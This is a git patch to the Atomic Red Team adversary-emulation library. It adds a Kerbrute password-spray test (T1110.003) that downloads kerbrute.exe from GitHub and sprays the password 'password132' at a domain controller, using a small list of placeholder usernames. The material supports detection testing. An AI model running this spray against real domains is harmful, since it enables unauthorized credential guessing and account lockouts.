From 44bb4bbadaef41bbcaf66d7ffefd2243a8738c97 Mon Sep 17 00:00:00 2001
From: TomFord3 <92330953+TomFord3@users.noreply.github.com>
Date: Thu, 1 Sep 2022 12:15:40 -0500
Subject: [PATCH] T1110.003 Kerbrute Password Spray (#2111)

* T1110.003 Kerbrute Password Spray

* Update T1110.003.yaml

Co-authored-by: Tom Hagan <thagan@nti.local>
---
 atomics/T1110.003/T1110.003.yaml        | 35 +++++++++++++++++++++++++
 atomics/T1110.003/src/passwordspray.txt |  7 +++++
 2 files changed, 42 insertions(+)
 create mode 100644 atomics/T1110.003/src/passwordspray.txt

diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 812f2ce3..f4cbfb54 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -253,3 +253,38 @@ atomic_tests:
     command: |
       import-module "$env:temp\MSOLSpray.ps1"
       Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
+- name: Password Spray using Kerbrute Tool
+  description: |  
+    Test a single password against a list of users
+  supported_platforms:
+  - windows
+  input_arguments:
+    domaincontroller:
+      description: Domain controller where test will be run
+      type: String
+      default: $ENV:userdnsdomain
+    domain:
+      description: Domain where you will be testing
+      type: String
+      default: $ENV:userdomain
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      kerbrute.exe must exist in $env:temp
+    prereq_command: |
+      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+    get_prereq_command: |
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+  - description: |
+      passwordspray.txt must exist in $env:temp
+    prereq_command: |
+      if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1}
+    get_prereq_command: |
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      cd $env:temp
+      .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 
+      
diff --git a/atomics/T1110.003/src/passwordspray.txt b/atomics/T1110.003/src/passwordspray.txt
new file mode 100644
index 00000000..3d0cd211
--- /dev/null
+++ b/atomics/T1110.003/src/passwordspray.txt
@@ -0,0 +1,7 @@
+test1
+test2
+test3
+test4
+test5
+passs_word
+drowssap
\ No newline at end of file